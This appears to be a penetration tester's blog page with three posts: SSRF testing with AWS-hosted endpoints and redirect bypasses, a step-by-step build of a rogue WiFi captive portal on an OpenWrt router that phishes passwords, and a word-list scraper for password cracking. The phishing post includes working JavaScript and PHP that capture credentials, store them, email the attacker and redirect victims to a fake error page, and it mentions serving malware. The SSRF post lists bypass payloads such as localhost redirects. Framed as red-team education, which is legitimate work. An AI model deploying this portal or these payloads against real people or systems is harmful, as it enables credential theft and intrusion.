Tuesday, October 3, 2017

Detecting SSRF Using AWS Services

Server Side Request Forgery (SSRF) is a fun vulnerability, its impact ranges from information disclosure via service detection to root. There are lots of good resources about SSRF out there, acunetix has a good blog post for understanding what the vulnerability is while Orange Tsai shows what can be accomplished using the vulnerability.

Detecting SSRF can be tricky, especially when protections against it have been implemented. During a pentest and when checking for SSRF it is extremely helpful to have control of a public web server which can accept incoming requests to see if the target application can be forced to make an outbound call to your external server and determine which payloads caused that to happen. It's also important to be able to configure redirect responses, for example, http://smeegesec.com could give a 302 Redirect to http://localhost:80 which may bypass protections the target application/server has implemented. An easy (and FREE!) way of doing this is using Amazon Web Services free tier.

To assist with SSRF testing I configured and used:

  • AWS EC2 Instance
  • Amazon S3 Bucket w/ Static website hosting
Even if you have no AWS experience it's pretty easy to get started. I won't go into too much detail in this post on how to setup and configure everything but this should be more than enough to get going:

Public Web Server using AWS EC2

Running a simple http server from AWS allows us to test the potentially vulnerable application to see if external requests are supported and the various URL formatting/encoding which is accepted.

  • SSH to the ec2 instance: ssh -i "<key>.pem" ec2-user@<PublicDNS>
  • Start a python web server from an empty temp directory: sudo python –m SimpleHTTPServer
  • Navigate to the ec2 instance in your AWS to get the public IP address.
  • You can now make calls to http://<public-ip>:<port> assuming the correct inbound/outbound rules have been configured to allow it.

Public Endpoint using Amazon S3 Bucket

S3 Buckets are useful as they are easy to configure and allow for customizable redirects. For instance, we can configure our S3 bucket endpoint to redirect to http://localhost:80 or similar.

  • Create an Amazon S3 Bucket
  • Select the bucket and enable “Properties > Static Web Hosting”
  • Here you will see your endpoint URL listed at the top with two options:
    • Use this bucket to host a website – This option allows us to utilize custom routing rules to determine what type of redirect is performed. I uploaded a demo index.html file and implemented the following routing rules:
      For additional information regarding routing rules, see: http://docs.aws.amazon.com/AmazonS3/latest/dev/how-to-page-redirect.html
    • Redirect Requests – Simply redirects ALL requests to a different domain using a 301 redirect code.

Restriction Bypasses

After attempting simple SSRF payloads such as “http://scanme.nmap.org:22”, “http://localhost:80”, “” and to our public web server, there may be a need to bypass restrictions the application or server has in place to prevent SSRF (some target applications may even be nice enough to throw a common error when the URL is invalid).
The ip.py script can be used to take a URL and encode it in various ways. The script can be found here: https://github.com/cujanovic/SSRF-Testing/blob/master/ip.py. The script takes the input of an IP and Port in addition to a valid domain which the application/server would typically allow (if it allows your public web server we can again check which requests actually hit it): python ip.py 80 www.google.com
The output is around 240 payloads which can be used to check for SSRF. It would be very easy to take this output and use Burp Intruder to quickly determine which payloads may have been accepted.

These payloads can also be configured as a redirect endpoint in AWS (see above) which makes for lots of options to potentially bypass any SSRF restrictions.

Additional Resources

  • https://github.com/cujanovic/SSRF-Testing
  • http://blog.safebuff.com/2016/07/03/SSRF-Tips/
  • https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SSRF%20injection
  • https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF
  • https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit
  • https://cfdb.io/Web/Server-Side%20Request%20Forgery

Monday, March 27, 2017

Captive Portal WiFi Phishing with OpenWrt

As companies and organizations are becoming more aware of security risks and implementing proper protections it can be difficult for pentesters and red teams to gain access to a network. Social engineering is a great way to accomplish that initial entry. Unfortunately when phishing e-mails or calls aren't working and you don't want to be too aggressive in your tactics you need another method. What if we create an access point (AP) in the company's vicinity and redirect any users who connect, hopefully employees of our target company, to a customized captive portal splash page to steal credentials? It would be similar to what you might find when connecting to a hotel wireless AP. In this attack we are depending on employees' desires to use their company or personal devices on an unmonitored "guest" wireless network - separate from the company's main AP.

There are many tools which conduct wireless attacks such as Wifiphisher, however, these typically perform aggressive attacks such as forcing a man-in-the-middle connection. Setting up a captive portal is a more passive approach. Something like a captive portal can be done with WiFi Pineapple, but I wanted to create my own for customization, cost savings, and fun.

For this project I wanted something small and portable which can be hidden in or around a company's physical location. I chose the TP-Link TL-MR3020 router which ranges from $30-$50. For storage and concealment purposes I used a SanDisk Cruzer Fit 8GB USB flash drive which can be bought for as little as $7. Optionally a portable battery pack can be used to power the router and those are fairly inexpensive as well. To connect my router to the internet during an attack I am using a Verizon MiFi, however, you could also use a nearby public AP as well.

The router is meant to be a client of the MiFi while broadcasting its own AP which redirects users to the captive portal where credentials can be stolen or malware can be introduced. Once we get a positive hit we can use the internet connection to contact us remotely. A diagram of the attack would look something like this:

The following is a step-by-step guide of my process. Skip to step 7 for the good stuff!

Step 1: Flash default router firmware

The default URL to access the web interface of the TP-Link router is with the credentials of admin:admin. For more detailed information regarding the router’s default configuration consult the router's user guide. Now flash the default firmware with the factory OpenWrt Barrier Breaker 14.07 firwmare: openwrt-ar71xx-generic-tl-mr3020-v1-squashfs-factory.bin. Note: No other version of OpenWrt has enough space to install the packages required to use the flash drive and expand the storage. After flashing OpenWrt you should be able to access the web interface at If you are having issues connecting try disabling other network adapters not being used to communicate with the router.

You may want to change the router’s IP address while you are setting everything up if it conflicts with other devices on your network. Go to Network > Interfaces > (br-lan) Edit > IPv4 Address to > Save & Apply. After the settings are saved you will probably need to request a new address to be able to connect to

Step 2: Connect router to internet

To connect the TP-Link TL-MR3020 router to the internet it must be a client of another internet-connected router first. To do this go to Network > Wifi > Scan > Join Network > WPA Passphrase (if applicable) > Submit. By default the mode should be “Client”. Submit these changes for the MR3020 to become a client of your home router. At this point you can confirm you have internet access by updating the package list or pinging a public host via SSH.

Step 3: Expand memory

The TP-Link TL-MR3020 router comes with very little memory which makes installing the packages I wanted impossible. Fortunately with a cheap flash drive I can expand that memory. I followed this resource from ediy.com using ExtRoot, however, when I tried installing the packages via the command opkg install block-mount kmod-usb-storage kmod-fs-ext4 I received the following errors:

To fix these errors we use WinSCP to replace the /etc/opkg.conf file with the following then run opkg update via SSH:
src/gz barrier_breaker_packages http://downloads.openwrt.org/barrier_breaker/14.07/ar71xx/generic/packages/packages
src/gz barrier_breaker_base http://downloads.openwrt.org/barrier_breaker/14.07/ar71xx/generic/packages/base
src/gz barrier_breaker_luci http://downloads.openwrt.org/barrier_breaker/14.07/ar71xx/generic/packages/luci
src/gz barrier_breaker_management http://downloads.openwrt.org/barrier_breaker/14.07/ar71xx/generic/packages/management
src/gz barrier_breaker_routing http://downloads.openwrt.org/barrier_breaker/14.07/ar71xx/generic/packages/routing
src/gz barrier_breaker_telephony http://downloads.openwrt.org/barrier_breaker/14.07/ar71xx/generic/packages/telephony
src/gz barrier_breaker_oldpackages http://downloads.openwrt.org/barrier_breaker/14.07/ar71xx/generic/packages/oldpackages/
dest root /
dest ram /tmp
lists_dir ext /var/opkg-lists
option overlay_root /overlay
Now the command opkg install block-mount kmod-usb-storage kmod-fs-ext4 should install the packages correctly. Just as ediy mentions, you can ignore a couple of kmod errors. Now reboot the router via the web interface or SSH. Partition the flash drive and insert it into the router. In an SSH terminal type block info to get the name of the flash drive:
Now the following commands can be used to copy rootfs to the flash drive:
mkdir /mnt/sda1
mount /dev/sda1 /mnt/sda1
mkdir -p /tmp/cproot
mount --bind / /tmp/cproot
tar -C /tmp/cproot/ -cvf - . | tar -C /mnt/sda1/ -xf –
umount /tmp/cproot/
If /etc/config/fstab does not exist on the router, type “block detect > /etc/config/fstab” via SSH and now make the following changes to the file via WinSCP:
Now the router can be rebooted and verify the increased amount of space using df –h.

Step 4: Create access point

To create an access point to broadcast to potential victims go to Network > Wifi > Add and create the following interface. Make sure the lan checkbox is checked. Select Wireless Security if you want to configure authentication. Save & Apply these settings. You should now have your TP-Link TL-MR3020 router as a client to your home router which it will use for internet and also its own broadcasting access point.

Step 5: Install NoDogSplash

To install NoDogSplash I used the web interface by going to System > Software > Filter “nodogsplash” > Find package > Install. If you can’t find the nodogsplash package, be sure to update your package lists:

Step 6: Install PHP

The ability to install various packages such as PHP was one of the main reasons why I initially expanded the amount of storage I had. Installing PHP is optional depending on what functionality you want and how you implement it. Since the NoDogSplash server does not support PHP, this allows me to use PHP with the default OpenWRT uHTTPd server without installing another separate web server. Installing PHP is easy via SSH with the opkg install php5 php5-cgi command. If this doesn’t work make sure you have the line src/gz barrier_breaker_oldpackages http://downloads.openwrt.org/barrier_breaker/14.07/ar71xx/generic/packages/oldpackages/ in your /etc/opkg.config file and update the package list. Finally in the /etc/config/uhttpd file add the line list interpreter '.php=/usr/bin/php-cgi' to the 'main' section.

Step 7: Configure splash page and capture credentials

This is the fun part where we can get creative! We want to create a splash page which is specific to our target environment in an attempt to trick users into submitting their credentials to us. We could also attempt to execute malicious JavaScript or serve a malicious file such as an executable, browser extension, or PDF. For now we will just capture user input such as local or network credentials which we can use to gain a foothold in the network or for use in other attacks.
Creating a realistic splash page targeted towards a company or organization can be accomplished with a simple mix of JavaScript, HTML, and CSS. Most companies will have specific logos, public images, color schemes, fonts, and more which can be used to create a realistic splash page. Here is an example of a simple splash page with a login form:

To capture any submitted credentials I use the following code for the login form (snippet):
<script type="text/javascript">
 function submitTextToCapture() {
      username = document.getElementById("username").value;
      password = document.getElementById("password").value;
      window.location = "" + username + "&password=" + password;
<form class="login-form">
 <input type="text" id="username" placeholder="username"/>
 <input type="password" id ="password" placeholder="password"/>
 <button type="button" id="button" onclick="submitTextToCapture()">Continue</button>
This splash page is served from the NoDogSplash server (/etc/nodogsplash/htdocs/) using port 2050. After a user enters their credentials and submits them, window.location redirects the user to capture.php which is served from the default OpenWRT uHTTPd server (/www/) on port 80. Sending the credentials to our capture.php page now gives us the ability to use PHP to perform the actions we want. As an example, I want to store credentials to the router and send myself an e-mail to alert me after credentials have been captured. To write to a local file I use the PHP fwrite function:
$username = $_GET["username"];
$password = $_GET["password"];
$redir = "";

$file = fopen("stored.txt", "a");
fwrite($file, "Username: " . $username . "\n" . "Password: " . $password . "\n\n");
To send an e-mail alert install msmtp on the router by running the command opkg install msmtp. Once installed, edit the /etc/msmtprc configuration file to include mail host information:
The php.ini file must then be edited to include the line sendmail_path = "/usr/bin/msmtp -C /path/to/your/config -t" which is usually /etc/msmtprc. For further instruction, see here. I then included the following code in my capture.php file to send an e-mail alert with some information about the client and redirect them to a fake error page:
$browser = $_SERVER['HTTP_USER_AGENT'];
$referrer = $_SERVER['HTTP_REFERER'];

$msg = "Credentials have been captured!\n\nIP: {$ip}\nBrowser: {$browser}\nReferrer: {$referrer}";

mail("example@gmail.com","*Captured Credentials*",$msg);

echo '<script type="text/javascript">window.location = "' . $redir . '"</script>';
The final result is an e-mail alert and the credentials being stored to a local file on the router:
Lastly, we can redirect the user to an error page stating the WiFi service is unavailable for some reason to reduce suspicions since we never intended on actually providing internet access. The goal of this attack is to be passive and inconspicuous.
All done! In the future I may post various ways to deliver other realistic payloads such as a malicious executable or browser extension.

https://www.hak5.org/hack/pineapple-phishing - Found this after my project, similar actions for pineapple.

Thursday, March 23, 2017

SmeegeScrape: Text Scraper and Custom Word List Generator

Click Here to Download Source Code

Customize your security testing with SmeegeScrape.py! It's a simple python script to scrape text from various sources including local files and web pages, and turn the text into a custom word list. A customized word list has many uses, from web application testing to password cracking, having a specific set of words to use against a target can increase efficiency and effectiveness during a penetration test. I realize there are other text scrapers publicly available however I feel this script is simple, efficient, and specific enough to warrant its own release. This script is able to read almost any file which has cleartext in it that python can open. I have also included support for file formats such as pdf, html, docx, and pptx.



SmeegeScrape.py {-f file | -d directory | -u web_url | -l url_list_file} [-o output_filename] [-s] [-i] [-min #] [-max #]

One of the following input types is required:(-f filename), (-d directory), (-u web_url), (-l url_list_file)

-h, --help show this help message and exit
-f LOCALFILE, --localFile LOCALFILE Specify a local file to scrape
-d DIRECTORY, --fileDirectory DIRECTORY Specify a directory to scrape the inside files
-u URL, --webUrl URL Specify a url to scrape page content (correct format: http(s)://smeegesec.com)
-l URL_LIST_FILE, --webList URL_LIST_FILE Specify a text file with a list of URLs to scrape (separated by newline)
-o FILENAME, --outputFile FILENAME Specify output filename (default: smeegescrape_out.txt)
-i, --integers Remove integers [0-9] from all output
-s, --specials Remove special characters from all output
-min # Specify the minimum length for all words in output
-max # Specify the maximum length for all words in output

Scraping a local file:

SmeegeScrape.py -f Test-File.txt
This is a sample text file with different text.
This file could be different filetypes including html, pdf, powerpoint, docx, etc.  
Anything which can be read in as cleartext can be scraped.
I hope you enjoy SmeegeScrape, feel free to comment if you like it!


Each word is separated by a newline. The options -i and -s can be used to remove any integers or special characters found. Also, the -min and -max arguments can be used to specify desired word length.

Scraping a web page:

SmeegeScrape.py -u http://www.smeegesec.com -si

To scrape web pages we use the python urllib2 module. The format of the url is checked via regex and it must be in the correct format (e.g. http(s)://smeegesec.com)

web scrape output

Scraping multiple files from a directory:

SmeegeScrape.py -d test\ -si -min 5 -max 12

The screen output shows each file which was scraped, the total number of unique words found based on the user's desired options, and the output filename.

directory scrape output

Scraping multiple URLs:

SmeegeScrape.py -l weblist.txt -si -min 6 -max 10

The -l option takes in a list of web urls from a text file and scrapes each url. Each scraped URL is displayed on the screen as well as a total number of words scraped.

url list scraping url list scraping 2

This weblist option is excellent to use with Burp Suite to scrape an entire site. To do this, proxy your web traffic through Burp and discover as much content on the target site as you can (spidering, manual discovery, dictionary attack on directories/files, etc.). After the discovery phase, right click on the target in the site map and select the option "Copy URLs in this host" from the drop down list. In this instance for even a small blog like mine over 300 URLs were copied. Depending on the size of the site the scraping could take a little while, be patient!

burp copy URLs in host

Now just paste the URLs into a text file and run that as input with the -l option.

SmeegeScrape.py -l SmeegeScrape-Burp-URLs.txt -si -min 6 -max 12
final output after parsing

So very easily we just scraped an entire site for words with specific attributes (length and character set) that we want.

As you can see there are many different possibilities with this script. I tried to make it as accurate as possible however sometimes the script depends on modules such as nltk, docx, etc. which may not always work correctly. In situations like this where the script is unable to read a certain file format, I would suggest trying to convert it to a more readable file type or copy/paste the text to a text file which can always be scraped.

The custom word list dictionaries you create are up to your imagination so have fun with it! This script could also be easily modified to extract phrases or sentences which could be used with password cracking passphrases. Here are a couple examples I made:

Holy Bible King James Version of 1611:
SmeegeScrape.py -f HolyBibleDocx.docx -si -min 6 -max 12 -o HolyBible_scraped.txt

Shakespeare's Romeo and Juliet:
SmeegeScrape.py -u http://shakespeare.mit.edu/romeo_juliet/full.html -si -min 6 -max 12 -o romeo_juliet_scraped.txt

Feel free to share your scraped lists or ideas on useful content to scrape. Comments and suggestions welcome, enjoy!